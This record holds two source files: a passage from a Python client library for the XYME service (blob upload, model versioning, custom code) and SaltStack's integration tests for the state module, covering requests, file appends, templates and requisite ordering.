new_owner: Optional[NodeHandle] = None,
external_owner: bool = False) -> 'BlobHandle':
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
owner_dag = \
None if new_owner is None else new_owner.get_dag().get_uri()
owner_node = None if new_owner is None else new_owner.get_id()
res = cast(CopyBlob, self._client.request_json(
METHOD_POST, "/copy_blob", {
"from_uri": self.get_uri(),
"owner_dag": owner_dag,
"owner_node": owner_node,
"external_owner": external_owner,
"to_uri": to_uri,
}))
return BlobHandle(self._client, res["new_uri"], is_full=False)
def download_zip(self, to_path: Optional[str]) -> Optional[io.BytesIO]:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
cur_res, _ = self._client.request_bytes(
METHOD_GET, "/download_zip", {
"blob": self.get_uri(),
})
if to_path is None:
return io.BytesIO(cur_res.read())
with open(to_path, "wb") as file_download:
file_download.write(cur_res.read())
return None
def _perform_upload_action(
self,
action: str,
additional: Dict[str, Union[str, int]],
fobj: Optional[IO[bytes]]) -> UploadFilesResponse:
args: Dict[str, Union[str, int]] = {
"action": action,
}
args.update(additional)
if fobj is not None:
method = METHOD_FILE
files: Optional[Dict[str, IO[bytes]]] = {
"file": fobj,
}
else:
method = METHOD_POST
files = None
if action == "clear":
self._tmp_uri = None
return cast(UploadFilesResponse, self._client.request_json(
method, "/upload_file", args, files=files))
def _start_upload(self, size: int, hash_str: str, ext: str) -> str:
res = self._perform_upload_action(
"start",
{
"target": self.get_uri(),
"hash": hash_str,
"size": size,
"ext": ext,
},
fobj=None)
assert res["uri"] is not None
return res["uri"]
def _append_upload(self, uri: str, fobj: IO[bytes]) -> int:
res = self._perform_upload_action("append", {"uri": uri}, fobj=fobj)
return res["pos"]
def _finish_upload_zip(self) -> List[str]:
uri = self._tmp_uri
if uri is None:
raise ValueError("tmp_uri is None")
res = cast(UploadFilesResponse, self._client.request_json(
METHOD_POST, "/finish_zip", {"uri": uri}))
return res["files"]
def _finish_upload_sklike(
self,
xcols: List[str],
is_clf: bool,
model_name: str,
maybe_classes: Optional[List[str]],
maybe_range: Tuple[Optional[float], Optional[float]],
full_init: bool) -> UploadFilesResponse:
uri = self._tmp_uri
if uri is None:
raise ValueError("tmp_uri is None")
return cast(UploadFilesResponse, self._client.request_json(
METHOD_POST, "/finish_sklike", {
"classes": maybe_classes,
"full_init": full_init,
"is_clf": is_clf,
"model_uri": self.get_uri(),
"model_name": model_name,
"output_range": maybe_range,
"owner_dag": self.get_owner_dag(),
"owner_node": self.get_owner_node(),
"tmp_uri": uri,
"xcols": xcols,
}))
def _clear_upload(self) -> None:
uri = self._tmp_uri
if uri is None:
raise ValueError("tmp_uri is None")
self._perform_upload_action("clear", {"uri": uri}, fobj=None)
def _upload_file(
self,
file_content: IO[bytes],
ext: str,
progress_bar: Optional[IO[Any]] = sys.stdout) -> None:
init_pos = file_content.seek(0, io.SEEK_CUR)
file_hash = get_file_hash(file_content)
total_size = file_content.seek(0, io.SEEK_END) - init_pos
file_content.seek(init_pos, io.SEEK_SET)
if progress_bar is not None:
progress_bar.write("Uploading file:\n")
print_progress = get_progress_bar(out=progress_bar)
tmp_uri = self._start_upload(total_size, file_hash, ext)
self._tmp_uri = tmp_uri
cur_size = 0
while True:
print_progress(cur_size / total_size, False)
buff = file_content.read(get_file_upload_chunk_size())
if not buff:
break
new_size = self._append_upload(tmp_uri, BytesIO(buff))
if new_size - cur_size != len(buff):
raise ValueError(
f"incomplete chunk upload n:{new_size} "
f"o:{cur_size} b:{len(buff)}")
cur_size = new_size
print_progress(cur_size / total_size, True)
def upload_zip(self, source: Union[str, io.BytesIO]) -> List['BlobHandle']:
files: List[str] = []
try:
if isinstance(source, str) or not hasattr(source, "read"):
with open(f"{source}", "rb") as fin:
self._upload_file(fin, ext="zip")
else:
self._upload_file(source, ext="zip")
files = self._finish_upload_zip()
finally:
self._clear_upload()
return [
BlobHandle(self._client, blob_uri, is_full=True)
for blob_uri in files
]
def upload_sklike_model_file(
self,
model_obj: IO[bytes],
xcols: List[str],
is_clf: bool,
model_name: str,
maybe_classes: Optional[List[str]] = None,
maybe_range: Optional[
Tuple[Optional[float], Optional[float]]] = None,
full_init: bool = True) -> UploadFilesResponse:
try:
self._upload_file(model_obj, ext="pkl")
output_range = (None, None) if maybe_range is None else maybe_range
return self._finish_upload_sklike(
model_name=model_name,
maybe_classes=maybe_classes,
maybe_range=output_range,
xcols=xcols,
is_clf=is_clf,
full_init=full_init)
finally:
self._clear_upload()
def upload_sklike_model(
self,
model: Any,
xcols: List[str],
is_clf: bool,
maybe_classes: Optional[List[str]] = None,
maybe_range: Optional[
Tuple[Optional[float], Optional[float]]] = None,
full_init: bool = True) -> UploadFilesResponse:
try:
model_name = type(model).__name__
except Exception as e:
raise ValueError(f"can not infer model name {model}") from e
try:
if is_clf and maybe_classes is None:
maybe_classes = model.classes_
except Exception as e:
raise ValueError(f"can not infer classes from {model}") from e
dump = pickle.dumps(model, pickle.HIGHEST_PROTOCOL)
with io.BytesIO(dump) as buffer:
return self.upload_sklike_model_file(
buffer,
xcols,
is_clf,
model_name,
maybe_classes,
maybe_range,
full_init)
def convert_model(self, reload: bool = True) -> ModelReleaseResponse:
return cast(ModelReleaseResponse, self._client.request_json(
METHOD_POST, "/convert_model", {
"blob": self.get_uri(),
"reload": reload,
}))
def delete(self) -> DeleteBlobResponse:
return cast(DeleteBlobResponse, self._client.request_json(
METHOD_DELETE, "/blob", {
"blob_uris": [self.get_uri()],
},
))
def get_model_release(self) -> ModelReleaseResponse:
return cast(ModelReleaseResponse, self._client.request_json(
METHOD_GET, "/model_release", {
"blob": self.get_uri(),
}))
def get_model_version(self) -> ModelVersionResponse:
return cast(ModelVersionResponse, self._client.request_json(
METHOD_GET, "/model_version", {
"model_uri": self.get_uri(),
}))
def _copy_model_version(
self,
model_uri: str,
read_version: Optional[int],
write_version: int,
overwrite: bool) -> ModelVersionResponse:
return cast(ModelVersionResponse, self._client.request_json(
METHOD_PUT, "/model_version", {
"model_uri": model_uri,
"read_version": read_version,
"write_version": write_version,
"overwrite": overwrite,
}))
def copy_model_version(
self,
read_version: int,
write_version: int,
overwrite: bool) -> ModelVersionResponse:
return self._copy_model_version(
model_uri=self.get_uri(),
read_version=read_version,
write_version=write_version,
overwrite=overwrite)
def delete_model_version(self, version: int) -> ModelVersionResponse:
return self._copy_model_version(
model_uri=self.get_uri(),
read_version=None,
write_version=version,
overwrite=True)
def __hash__(self) -> int:
return hash(self.as_str())
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
return self.as_str() == other.as_str()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
def __str__(self) -> str:
return self.as_str()
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self.as_str()}]"
# *** BlobHandle ***
class CSVBlobHandle(BlobHandle):
def finish_csv_upload(
self, filename: Optional[str] = None) -> UploadFilesResponse:
tmp_uri = self._tmp_uri
if tmp_uri is None:
raise ValueError("tmp_uri is None")
args: Dict[str, Optional[Union[str, int]]] = {
"tmp_uri": tmp_uri,
"csv_uri": self.get_uri(),
"owner_dag": self.get_owner_dag(),
"owner_node": self.get_owner_node(),
"filename": filename,
}
return cast(UploadFilesResponse, self._client.request_json(
METHOD_POST, "/finish_csv", args))
def add_from_file(
self,
filename: str,
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> Optional[UploadFilesResponse]:
fname = filename
if filename.endswith(INPUT_ZIP_EXT):
fname = filename[:-len(INPUT_ZIP_EXT)]
ext_pos = fname.rfind(".")
if ext_pos >= 0:
ext = filename[ext_pos + 1:] # full filename
else:
raise ValueError("could not determine extension")
try:
with open(filename, "rb") as fbuff:
self._upload_file(
fbuff,
ext=ext,
progress_bar=progress_bar)
return self.finish_csv_upload(filename)
finally:
self._clear_upload()
def add_from_df(
self,
df: pd.DataFrame,
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> Optional[UploadFilesResponse]:
io_in = None
try:
io_in = df_to_csv_bytes(df)
self._upload_file(
io_in,
ext="csv",
progress_bar=progress_bar)
return self.finish_csv_upload()
finally:
if io_in is not None:
io_in.close()
self._clear_upload()
def add_from_content(
self,
content: Union[bytes, str, pd.DataFrame],
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> Optional[UploadFilesResponse]:
io_in = None
try:
io_in = content_to_csv_bytes(content)
self._upload_file(
io_in,
ext="csv",
progress_bar=progress_bar)
return self.finish_csv_upload()
finally:
if io_in is not None:
io_in.close()
self._clear_upload()
# *** CSVBlobHandle ***
class JSONBlobHandle(BlobHandle):
def __init__(
self,
client: XYMEClient,
uri: str,
is_full: bool) -> None:
super().__init__(client, uri, is_full)
self._count: Optional[int] = None
def get_count(self) -> Optional[int]:
return self._count
def append_jsons(
self,
jsons: List[Any],
requeue_on_finish: Optional[NodeHandle] = None,
) -> None:
obj = {
"blob": self.get_uri(),
"jsons": jsons,
}
if requeue_on_finish is not None:
obj["dag"] = requeue_on_finish.get_dag().get_uri()
obj["node"] = requeue_on_finish.get_id()
res = cast(JSONBlobAppendResponse, self._client.request_json(
METHOD_PUT, "/json_append", obj))
self._count = res["count"]
# *** JSONBlobHandle ***
class CustomCodeBlobHandle(BlobHandle):
def set_custom_imports(
self, modules: List[List[str]]) -> NodeCustomImports:
return cast(NodeCustomImports, self._client.request_json(
METHOD_PUT, "/custom_imports", {
"dag": self.get_owner_dag(),
"node": self.get_owner_node(),
"modules": modules,
}))
def get_custom_imports(self) -> NodeCustomImports:
return cast(NodeCustomImports, self._client.request_json(
METHOD_GET, "/custom_imports", {
"dag": self.get_owner_dag(),
"node": self.get_owner_node(),
}))
def set_custom_code(self, func: FUNC) -> NodeCustomCode:
from RestrictedPython import compile_restricted
def fn_as_str(fun: FUNC) -> str:
body = textwrap.dedent(inspect.getsource(fun))
res = body + textwrap.dedent(f"""
result = {fun.__name__}(*data, **kwargs)
if result is None:
raise ValueError("{fun.__name__} must return a value")
""")
compile_restricted(res, "inline", "exec")
return res
raw_code = fn_as_str(func)
return cast(NodeCustomCode, self._client.request_json(
METHOD_PUT, "/custom_code", {
"dag": self.get_owner_dag(),
"node": self.get_owner_node(),
"code": raw_code,
}))
def get_custom_code(self) -> NodeCustomCode:
return cast(NodeCustomCode, self._client.request_json(
METHOD_GET, "/custom_code", {
"dag": self.get_owner_dag(),
"node": self.get_owner_node(),
}))
# *** CustomCodeBlobHandle ***
class ComputationHandle:
def __init__(
self,
dag: DagHandle,
value_id: str,
get_dyn_error: Callable[[], Optional[str]],
set_dyn_error: Callable[[str], None]) -> None:
self._dag = dag
self._value_id = value_id
self._value: Optional[ByteResponse] = None
self._get_dyn_error = get_dyn_error
self._set_dyn_error = set_dyn_error
def has_fetched(self) -> bool:
return self._value is not None
def get(self) -> ByteResponse:
try:
if self._value is None:
self._value = self._dag.get_dynamic_result(self._value_id)
return self._value
except ServerSideError as e:
if self._get_dyn_error() is None:
self._set_dyn_error(str(e))
raise e
except KeyError as e:
maybe_error = self._get_dyn_error()
if maybe_error is not None:
raise ServerSideError(maybe_error) from e
raise e
def get_id(self) -> str:
return self._value_id
def __str__(self) -> str:
value = self._value
if value is None:
return f"value_id={self._value_id}"
return f"value({type(value)})={value}"
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self.__str__()}]"
def __hash__(self) -> int:
return hash(self.get_id())
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
return self.get_id() == other.get_id()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
# *** ComputationHandle ***
def default_xyme_client() -> XYMEClient:
return create_xyme_client(
url=DEFAULT_URL,
token=os.getenv("XYME_SERVER_TOKEN"),
namespace=DEFAULT_NAMESPACE)
def create_xyme_client(
url: str,
token: Optional[str] = None,
namespace: str = DEFAULT_NAMESPACE) -> XYMEClient:
try:
return XYMEClient(url, token, namespace)
except LegacyVersion as lve:
api_version = lve.get_api_version()
if api_version == 3:
from accern_xyme.v3.accern_xyme import create_xyme_client_v3
return create_xyme_client_v3(url, token) # type: ignore
raise lve
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir, flaky
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
_reline(destpath)
destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
_reline(destpath)
cls.TIMEOUT = 600 if salt.utils.platform.is_windows() else 10
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_show_states(self):
'''
state.show_states
'''
states = self.run_function('state.show_states')
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
states = self.run_function('state.show_states', sorted=False)
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete if exiting
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
Ensure theses errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# undetected infinite loopS prevents this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
'changes': descr['changes'] != {} # whether there where any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
